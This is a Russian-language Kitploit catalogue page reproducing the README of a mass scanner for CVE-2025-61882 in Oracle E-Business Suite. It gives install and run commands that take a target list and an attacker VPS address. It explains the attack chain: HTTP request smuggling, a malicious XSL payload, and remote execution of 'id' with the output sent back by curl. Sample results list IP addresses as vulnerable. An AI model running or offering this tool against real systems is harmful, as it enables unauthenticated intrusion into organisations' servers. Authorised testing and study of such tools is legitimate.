Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61882 — Многопоточный сканер для CVE-2025-61882 в Oracle E-Business Suite, использующий контрабанду HTTP-запросов для достижения неаутентифицированного удалённого выполнения кода и проверки через вывод команд. | Kitploit
Инструменты/GitHubGitHub/sachinart/cve-2025-61882
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Многопоточный сканер для CVE-2025-61882 в Oracle E-Business Suite, использующий контрабанду HTTP-запросов для достижения неаутентифицированного удалённого выполнения кода и проверки через вывод команд.

Репозиторий
117120 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер RCE для Oracle E-Business Suite (CVE-2025-61882)

Быстрый многопоточный массовый сканер для обнаружения CVE-2025-61882 в установках Oracle E-Business Suite. Эта критическая уязвимость позволяет неаутентифицированное удалённое выполнение кода.

Python Version License CVE

🎯 Возможности

  • Массовое сканирование — обработка сотен или тысяч целей из файла
  • Многопоточность — настраиваемое параллельное сканирование (по умолчанию: 20 потоков)
  • Автоматическое обнаружение — проверка RCE путём выполнения команды id и анализа вывода
  • Результаты в реальном времени — уязвимые цели немедленно записываются в vuln-output.txt
  • Случайные порты — используются случайные порты (2000-9999) для каждой цели во избежание конфликтов
  • Чистый вывод — отслеживание прогресса с минимальным шумом

📋 Требования

pip install requests

И всё. Нужны только Python 3.7+ и библиотека requests.

🚀 Установка

git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Использование

Базовое сканирование

python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

Быстрое сканирование (50 потоков)

python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

Консервативное сканирование (10 потоков)

python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 Формат файла целей

Создайте файл targets.txt с одним URL в строке:

http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Пример вывода

╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 Выходной файл

Результаты сохраняются в vuln-output.txt:

# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 Как это работает

  1. Получение CSRF-токена — извлекает действующий CSRF-токен с цели
  2. HTTP Request Smuggling — эксплуатирует уязвимость контрабанды запросов для внедрения вредоносной полезной нагрузки
  3. Доставка XSL-полезной нагрузки — обслуживает вредоносную XSL-таблицу стилей, которая выполняет команды
  4. Проверка обратного вызова — цель выполняет команду id и отправляет вывод обратно через curl
  5. Сопоставление по регулярному выражению — подтверждает успешный RCE путём проверки шаблона uid=...gid=...

⚙️ Конфигурация

АргументОбязательныйПо умолчаниюОписание
--targetsДа-Путь к файлу, содержащему URL целей
--lhostДа-IP-адрес вашего VPS/атакующего
--threadsНет20Количество параллельных потоков

🔒 Ответственное раскрытие

Этот инструмент предназначен только для авторизованного тестирования безопасности. Всегда:

  • ✅ Получайте письменное разрешение перед тестированием
  • ✅ Сканируйте только те системы, которыми владеете или на тестирование которых имеете явное разрешение
  • ✅ Ответственно сообщайте о находках затронутым организациям
  • ✅ Следуйте практике скоординированного раскрытия уязвимостей
  • ❌ Никогда не используйте это на неавторизованных системах

Несанкционированный доступ к компьютерным системам является незаконным.

🐛 Известные проблемы

  • Некоторые цели могут не отвечать из-за блокировки межсетевым экраном/IDS
  • Обнаружение обратного вызова требует, чтобы цель могла связаться с вашим VPS на случайных портах
  • Предупреждения о сертификатах SSL подавляются (ожидаемо для пентестинга)

🤝 Вклад в проект

Нашли ошибку? Есть запрос функции?

  1. Сделайте форк репозитория
  2. Создайте свою ветку функции (git checkout -b feature/amazing-feature)
  3. Зафиксируйте изменения (git commit -m 'Add some feature')
  4. Отправьте в ветку (git push origin feature/amazing-feature)
  5. Откройте Pull Request

📜 Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.

📚 Ссылки

  • Детали CVE-2025-61882
  • Критическое обновление Oracle

👨‍💻 Разработано Chirag Artani

Веб-сайт • Twitter • LinkedIn

Сделано с ❤️ для сообщества infosec

Скачать инструмент